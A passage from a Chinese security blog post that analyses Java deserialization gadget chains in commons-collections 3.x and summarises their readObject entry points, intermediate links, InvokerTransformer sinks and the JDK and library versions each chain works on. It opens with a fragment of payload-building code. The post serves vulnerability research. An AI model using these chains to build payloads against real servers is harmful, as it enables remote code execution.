填充真正的命令执行代码</span></span><br><span class="line">Reflections.setFieldValue(transformerChain, <span class="string">"iTransformers"</span>, transformers);</span><br><span class="line"><span class="keyword">return</span> hashtable;</span><br></pre></td></tr></table></figure>
<h2 id="7-梅子酒师傅的CommonsCollections9"><a href="#7-梅子酒师傅的CommonsCollections9" class="headerlink" title="7. 梅子酒师傅的CommonsCollections9"></a>7. 梅子酒师傅的CommonsCollections9</h2><p>找到上面CommonsCollections10时，在网上找了一下有没有师傅已经挖到过了，一共找到下面三位师傅</p>
<ul>
<li><a href="https://github.com/Jayl1n/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections8.java" target="_blank" rel="noopener">https://github.com/Jayl1n/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections8.java</a></li>
<li><a href="https://github.com/frohoff/ysoserial/pull/125/commits/4edf02ba7765488cac124c92e04c6aae40da3e5d" target="_blank" rel="noopener">https://github.com/frohoff/ysoserial/pull/125/commits/4edf02ba7765488cac124c92e04c6aae40da3e5d</a></li>
<li><a href="https://github.com/frohoff/ysoserial/pull/116" target="_blank" rel="noopener">https://github.com/frohoff/ysoserial/pull/116</a></li>
</ul>
<p>一个一个来说</p>
<ol>
<li><p>第一个<a href="https://github.com/Jayl1n" target="_blank" rel="noopener">Jayl1n</a>师傅做的改变主要是最终的Runtime.getRuntime().exec改成了URLClassLoader.loadClass().newInstance的方式，前面用的还是CommonsCollections6，这里暂时不将其归类为新的利用链。</p>
</li>
<li><p>第二个是<strong><a href="https://github.com/meizjm3i" target="_blank" rel="noopener">梅子酒</a></strong>师傅提交的CommonsCollections9，主要利用的是CommonsCollections:3.2版本新增的<code>DefaultedMap</code>来代替<code>LazyMap</code>，因为这两个Map有同样的get函数可以被利用，这里不再具体分析。</p>
</li>
<li>第三个是<strong><a href="https://github.com/navalorenzo" target="_blank" rel="noopener">navalorenzo</a></strong>师傅提交的CommonsCollections8，其利用链基于CommonsCollections:4.0版本，暂时不在本篇文章的分析范围内，后面会好好分析一下。</li>
</ol>
<h1 id="0x03-总结"><a href="#0x03-总结" class="headerlink" title="0x03 总结"></a>0x03 总结</h1><p>联合前面两篇文章<a href="http://blog.0kami.cn/2019/10/24/study-java-deserialized-vulnerability/">CommonsCollections1</a>、<a href="http://blog.0kami.cn/2019/10/28/study-java-deserialized-commonscollections3/">CommonsCollections3</a>，在加上本文的CommonsCollections5，6，7，9，10。</p>
<p>由于网上已经有类似的文章做了<a href="https://www.freebuf.com/articles/web/214096.html" target="_blank" rel="noopener">总结</a>，这里就简单做一下CommonsCollections&lt;=3.2.1下的反序列化利用链的总结。</p>
<hr>
<ul>
<li>起始点<ol>
<li><code>AnnotationInvocationHandler</code>的<code>readObject</code></li>
<li><code>BadAttributeValueExpException</code>的<code>readObject</code></li>
<li><code>HashSet</code>的<code>readObject</code></li>
<li><code>Hashtable</code>的<code>readObject</code></li>
</ol>
</li>
<li>重要的承接点<ol>
<li><code>LazyMap</code>的<code>get</code></li>
<li><code>DefaultedMap</code>的<code>get</code></li>
<li><code>TiedMapEntry</code>的<code>getValue</code></li>
<li><code>Proxy</code>的<code>invoke</code></li>
</ol>
</li>
<li>终点<ol>
<li><code>ChainedTransformer</code>的<code>transform</code></li>
<li><code>InvokerTransformer</code>的<code>transform</code></li>
<li><code>ConstantTransformer</code>的<code>transform</code></li>
</ol>
</li>
</ul>
<hr>
<p>各exp的jdk适用版本</p>
<ol>
<li>jdk7 =&gt; CommonsCollection1、3</li>
<li>jdk7 &amp; jdk8 =&gt; CommonsCollections5,6,7,9,10</li>
</ol>
<p>各exp的commons-collections适用版本</p>
<ol>
<li>commons-collections&lt;=3.1 CommonsCollections1,3,5,6,7,10</li>
<li>commons-collections&lt;=3.2.1 CommonsCollections1,3,5,6,7,9,10</li>
</ol>
<hr>
<p>最后的最后，commons-collections:3.x版本的反序列化利用链就分析到这里，其实我相信如果想继续挖可代替的利用链还是会有的，就像本文挖到的CommonsCollections10，如果各位师傅有兴趣可以继续挖下去，也欢迎和各位师傅一起交流。</p>
<p>后续还会把commons-collections:4版本的利用链做一个分析，欢迎一起交流：）</p>

  	</div>
	  
	  <div class="article-tags tags">
      
        <a href="/tags/vul/">vul</a>
      
	  </div>
    

	
		<div class="art-item-footer">
				
					<span class="art-item-left"><i class="icon icon-chevron-thin-left"></i>prev：<a href="/2019/11/05/java/study-java-deserialized-commonscollections4/" rel="prev"  title="【notes】Java反序列化利用链挖掘之CommonsCollections2,4,8">
						【notes】Java反序列化利用链挖掘之CommonsCollections2,4,8
					</a></span>
				
				
					<span class="art-item-right">next：<a href="/2019/10/28/java/study-java-deserialized-commonscollections3-3/" rel="next"  title="【notes】Java反序列化利用链挖掘之CommonsCollections3">
						【notes】Java反序列化利用链挖掘之CommonsCollections3
					</a><i class="icon icon-chevron-thin-right"></i></span>
				
		</div>
	
	</section>
	
		<section id="comments">
			<div id="disqus_thread"></div>
		</section>
	
</article>
<script>
	window.subData = {
		title: '【notes】Java反序列化利用链挖掘之CommonsCollections5,6,7,9,10',
		tools: true
	}
</script>

      </div>
      <aside class='l_side'>
        
  <section class='m_widget about'>

<div class='header'>wh1t3p1g</div>
<div class='content'>
<div class='desc'>A Web 🐶 &amp;&amp; Code Reviewer</div>
</div>
</section>

  <section class='m_widget links'>
<div class='header'>Links</div>
<div class='content'>
    <ul class="entry">
    
        <li><a class="flat-box" target="_blank" href="http://blog.orleven.com">
            <div class='name'>orleven</div>
        </a></li>
    
        <li><a class="flat-box" target="_blank" href="http://www.warmeng.com">
            <div class='name'>warmeng</div>
        </a></li>
    
    </ul>
</div>
</section>

  <section class='m_widget categories'>
<div class='header'>Categories</div>
<div class='content'>
    
    <ul class="entry">
    
        <li><a class="flat-box" href="/categories/codereview/"><div class='name'>codereview</div><div class='badget'>10</div></a></li>
    
        <li><a class="flat-box" href="/categories/ctf/"><div class='name'>ctf</div><div class='badget'>6</div></a></li>
    
        <li><a class="flat-box" href="/categories/notes/"><div class='name'>notes</div><div class='badget'>23</div></a></li>
    
    </ul>
    
</div>
</section>

  
<div class="m_widget tagcloud">
    <div class="header">Tags</div>
    <div class='content'>
        <a href="/tags/bctf/" style="font-size: 14px; color: #808080">bctf</a> <a href="/tags/cms/" style="font-size: 18px; color: #2b2b2b">cms</a> <a href="/tags/ctf/" style="font-size: 14px; color: #808080">ctf</a> <a href="/tags/cve/" style="font-size: 16px; color: #555">cve</a> <a href="/tags/ddctf/" style="font-size: 14px; color: #808080">ddctf</a> <a href="/tags/hitbxctf/" style="font-size: 14px; color: #808080">hitbxctf</a> <a href="/tags/mobile/" style="font-size: 14px; color: #808080">mobile</a> <a href="/tags/njctf/" style="font-size: 14px; color: #808080">njctf</a> <a href="/tags/others/" style="font-size: 16px; color: #555">others</a> <a href="/tags/suctf/" style="font-size: 14px; color: #808080">suctf</a> <a href="/tags/vul/" style="font-size: 20px; color: #000">vul</a>
    </div>
</div>



      </aside>
      <script>setLoadingBarProgress(60);</script>
    </div>
  </div>
  <footer id="footer" class="clearfix">

	<div class="social-wrapper">
  	
      
        <a href="https://github.com/wh1t3p1g" class="social github"
          target="_blank" rel="external">
          <span class="icon icon-github"></span>
        </a>
      
        <a href="/atom.xml" class="social rss"
          target="_blank" rel="external">
          <span class="icon icon-rss"></span>
        </a>
      
    
  </div>
  
  <div>Theme <a href='https://github.com/stkevintan/hexo-theme-material-flow' class="codename">MaterialFlow</a> designed by <a href="http://keyin.me/" target="_blank">Kevin Tan</a>.</div>
  
</footer>


  <script>setLoadingBarProgress(80);</script>
  
<script>
  var disqus_shortname = '0kami';
  
  var disqus_url = 'http://blog.0kami.cn/2019/10/31/java/study-java-deserialized-commonscollections3-others/';
  
  (function(){
    var dsq = document.createElement('script');
    dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>


<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src='//cdn.bootcss.com/node-waves/0.7.5/waves.min.js'></script>
<script src="//cdn.bootcss.com/scrollReveal.js/3.3.2/scrollreveal.min.js"></script>
<script src="/js/jquery.fitvids.js"></script>
<script>
	var GOOGLE_CUSTOM_SEARCH_API_KEY = "";
	var GOOGLE_CUSTOM_SEARCH_ENGINE_ID = "";
	var ALGOLIA_API_KEY = "";
	var ALGOLIA_APP_ID = "";
	var ALGOLIA_INDEX_NAME = "";
  var AZURE_SERVICE_NAME = "";
  var AZURE_INDEX_NAME = "";
  var AZURE_QUERY_KEY = "";
  var BAIDU_API_ID = "";
  var SEARCH_SERVICE = "hexo";
  var ROOT = "/"||"/";
  if(!ROOT.endsWith('/'))ROOT += '/';
</script>
<script src="/js/search.js"></script>
<script src="/js/app.js"></script>


  <script>setLoadingBarProgress(100);</script>
</body>
</html>
